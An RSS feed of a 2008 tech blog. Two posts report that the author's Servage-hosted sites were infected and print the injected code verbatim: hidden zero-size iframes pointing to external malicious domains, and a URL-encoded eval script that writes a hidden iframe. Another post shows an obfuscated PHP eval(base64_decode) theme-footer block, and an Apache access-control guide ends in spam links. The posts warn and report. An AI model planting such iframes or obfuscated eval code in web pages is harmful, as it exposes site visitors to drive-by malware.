<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Proxyutza blog &#187; Hacks</title>
	<atom:link href="http://www.proxyutza.com/category/hacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.proxyutza.com</link>
	<description>About all sorth of things: PHP, Hacks, Scripts, Servers, Linux, Technology, News, Trends</description>
	<lastBuildDate>Wed, 26 May 2010 10:37:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Servage got hacked again</title>
		<link>http://www.proxyutza.com/servage-got-hacked-again/</link>
		<comments>http://www.proxyutza.com/servage-got-hacked-again/#comments</comments>
		<pubDate>Sun, 18 May 2008 11:21:38 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Hosting]]></category>
		<category><![CDATA[Hacked]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[Inject]]></category>
		<category><![CDATA[Servage]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/servage-got-hacked-again/</guid>
		<description><![CDATA[This time, every index file on the cluster I&#8217;m in got injected with this code &#60;!-- + --&#62;&#60;iframe src="http://rublic.info/ice/ice/index.php" width="0" height="0"&#62;&#60;/iframe&#62;&#60;!-- + --&#62; &#60;!-- + --&#62;&#60;iframe src="http://rublic.info/ice/ice/index.php" width="0" height="0"&#62;&#60;/iframe&#62;&#60;!-- + --&#62; I&#8217;ve removed the malicious code and i suggest you check your websites too.]]></description>
			<content:encoded><![CDATA[<p>This time, every index file on the cluster I&#8217;m in got injected with this code<br />
<code><br />
&lt;!-- + --&gt;&lt;iframe src="http://rublic.info/ice/ice/index.php" width="0" height="0"&gt;&lt;/iframe&gt;&lt;!-- + --&gt;<br />
&lt;!-- + --&gt;&lt;iframe src="http://rublic.info/ice/ice/index.php" width="0" height="0"&gt;&lt;/iframe&gt;&lt;!-- + --&gt;</code></p>
<p>I&#8217;ve removed the malicious code and i suggest you check your websites too.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/servage-got-hacked-again/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Servage hacked: Exploit-Iframe (Trojan) Infection</title>
		<link>http://www.proxyutza.com/exploit-iframe-trojan-infection/</link>
		<comments>http://www.proxyutza.com/exploit-iframe-trojan-infection/#comments</comments>
		<pubDate>Fri, 07 Mar 2008 11:56:32 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[Mcafee]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/03/07/exploit-iframe-trojan-infection/</guid>
		<description><![CDATA[I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage&#8217;s servers [...]]]></description>
			<content:encoded><![CDATA[<p>I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage&#8217;s servers but they denied it. They also said no one else reported this which i dont believe its true. The infection code is this :</p>
<p>&lt;code&gt;&lt;iframe src=&#8221;http://fredkidns.com/check/upd.php?t=562&#8243; border=&#8221;0&#8243; height=&#8221;0&#8243; width=&#8221;0&#8243;&gt;&lt;/iframe&gt;&lt;/code&gt;<br />
&lt;code&gt;&lt;iframe src=&#8221;http://bestinlive.cn/i/index.php&#8221; border=&#8221;0&#8243; height=&#8221;0&#8243; width=&#8221;0&#8243;&gt;<br />
&lt;/iframe&gt;&lt;script&gt;eval(unescape(&#8220;%77%69%6e%64%6f%77%2e%73%<br />
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75<br />
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%<br />
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%<br />
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%<br />
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2<br />
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68<br />
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%<br />
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%<br />
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3<br />
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6<br />
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65<br />
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29&#8243;)); &lt;/script&gt;&lt;/code&gt;</p>
<p>note: the line is so long that i had to insert line breaks<br />
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.</p>
<p><a href="http://www.proxyutza.com/2008/03/07/exploit-iframe-trojan-infection/exploit-iframe-trojan-infection-2/" rel="attachment wp-att-27" title="Exploit-Iframe (Trojan) Infection"><img src="http://www.proxyutza.com/wp-content/uploads/2008/03/mcafee-iframe-trojan.GIF" alt="Exploit-Iframe (Trojan) Infection" height="304" width="404" /></a></p>
<p>I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/exploit-iframe-trojan-infection/feed/</wfw:commentRss>
		<slash:comments>124</slash:comments>
		</item>
		<item>
		<title>Apache &#8211; Restrict access to certain directory by IP</title>
		<link>http://www.proxyutza.com/apache-restrict-access-to-certain-directory-by-ip/</link>
		<comments>http://www.proxyutza.com/apache-restrict-access-to-certain-directory-by-ip/#comments</comments>
		<pubDate>Wed, 27 Feb 2008 09:26:26 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Apache]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[forbidden]]></category>
		<category><![CDATA[restric access]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/02/27/apache-restrict-access-to-certain-directory-by-ip/</guid>
		<description><![CDATA[You can use this method to allow certain ip&#8217;s to access certain directories or to deny certain ip&#8217;s to access certain directories, its up to you how you want to protect that directory. In this example im gonna show you how to restrict access to a directory named &#8220;restricted&#8221; to a single ip, so when [...]]]></description>
			<content:encoded><![CDATA[<p><a title="Hide Apache Version info from footer for a more secured webserver" rel="attachment wp-att-14" href="http://www.proxyutza.com/hide-apache-version-info-from-footer-for-a-more-secured-webserver/hide-apache-version-info-from-footer-for-a-more-secured-webserver/"><img src="http://www.proxyutza.com/wp-content/uploads/2008/02/apache_webserver_logo.png" alt="Hide Apache Version info from footer for a more secured webserver" align="left" /></a>You can use this method to allow certain ip&#8217;s to access certain directories or to deny certain ip&#8217;s to access certain directories, its up to you how you want to protect that directory. In this example im gonna show you how to restrict access to a directory named &#8220;restricted&#8221; to a single ip, so when any other ip that is not in the list tries to access that directory it will get a page saying</p>
<h1>Forbidden</h1>
<p>You don&#8217;t have permission to access /restricted on this server.</p>
<p>The explanations work on Debian with Apache2 tested by me, but also it should work on any other OS and Apache2 version. Here is how you do it: you need to edit the following file /etc/apache2/sites-available/default and you do that with the following commmand:</p>
<p><strong>nano /etc/apache2/sites-available/default </strong></p>
<p>now at the end of the file on top of &lt;/VirtualHost&gt; you need to add the following:</p>
<p><strong>&lt;Directory &#8220;/var/www/restricted/&#8221;&gt;<br />
Options Indexes MultiViews FollowSymLinks<br />
AllowOverride None<br />
Order deny,allow<br />
Deny from all<br />
Allow from 1.1.1.1<br />
&lt;/Directory&gt;</strong></p>
<p>replace &#8220;1.1.1.1&#8243; with your ip and  &#8220;/var/www/restricted/&#8221; with the path to the directory you want to restrict access to.</p>
<p>Now press ctrl+x and then Y to confirm and save the modifications. Now we need to reload the config file with the following command and we are done.</p>
<p><strong>/etc/init.d/apache2 reload </strong></p>
<p><span style="color: #888888;">Most of the Microsoft <a href="http://www.testking.com/70-624.htm">70-624</a> deploying and maintaining windows vista client and 2007 office system desktops and Microsoft <a href="http://www.testking.com/70-238.htm">70-238</a> deploying messaging solutions with exchange server 2007 professionals deem Cisco <a href="http://www.testking.com/642-971.htm">642-971</a> data center network infrastructure design and Microsoft <a href="http://www.testking.com/70-453.htm">70-453</a> for transition MCITP SQL server 2005 DBA mandatory for every IBM <a href="http://www.testking.com/000-960.htm">000-960</a> storage sales.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/apache-restrict-access-to-certain-directory-by-ip/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Decoding with the script from earlier post failed on some code</title>
		<link>http://www.proxyutza.com/decoding-with-the-script-from-earlier-post-failed-on-some-code/</link>
		<comments>http://www.proxyutza.com/decoding-with-the-script-from-earlier-post-failed-on-some-code/#comments</comments>
		<pubDate>Sat, 23 Feb 2008 14:02:15 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[base64_decode]]></category>
		<category><![CDATA[decode]]></category>
		<category><![CDATA[eval]]></category>
		<category><![CDATA[gzinflate]]></category>
		<category><![CDATA[theme]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/02/23/decoding-with-the-script-from-earlier-post-failed-on-some-code/</guid>
		<description><![CDATA[Today i tried to decode another pice of ugly code with &#8220;eval(gzinflate(base64_decode&#8221; and i was surprised to find that the script couldnt decode this piece. As usually the code is from a themes footer in which i dont want to keep theep the outgoing reffers. Here is the code: $_F=__FILE__;$_X='Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ [...]]]></description>
			<content:encoded><![CDATA[<p>Today i tried to decode another pice of ugly code with &#8220;eval(gzinflate(base64_decode&#8221; and i was surprised to find that the script couldnt decode this piece. As usually the code is from a themes footer in which i dont want to keep theep the outgoing reffers.</p>
<p>Here is the code:<br />
<code><br />
$_F=__FILE__;$_X='Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj<br />
JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD<br />
ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ<br />
gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP<br />
SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM<br />
jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ<br />
o8P3BocCAvKiAiSjNzdCB3aDF0IGQyIHkyMyB0aDRuayB5MjMncjUgZDI0bm<br />
cgRDF2NT8iICovID8+DQoNCgkJPD9waHAgd3BfZjIydDVyKCk7ID8+DQo8L2<br />
IyZHk+DQo8L2h0bWw+DQo=';eval(base64_decode('JF9YPWJhc2U2NF9k<br />
ZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdW<br />
llMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0<br />
YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));<br />
</code></p>
<p>For the moment i&#8217;m stuck with the code.. and trying to find a solution.. I will give an update if i succeed in decoding it.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/decoding-with-the-script-from-earlier-post-failed-on-some-code/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>
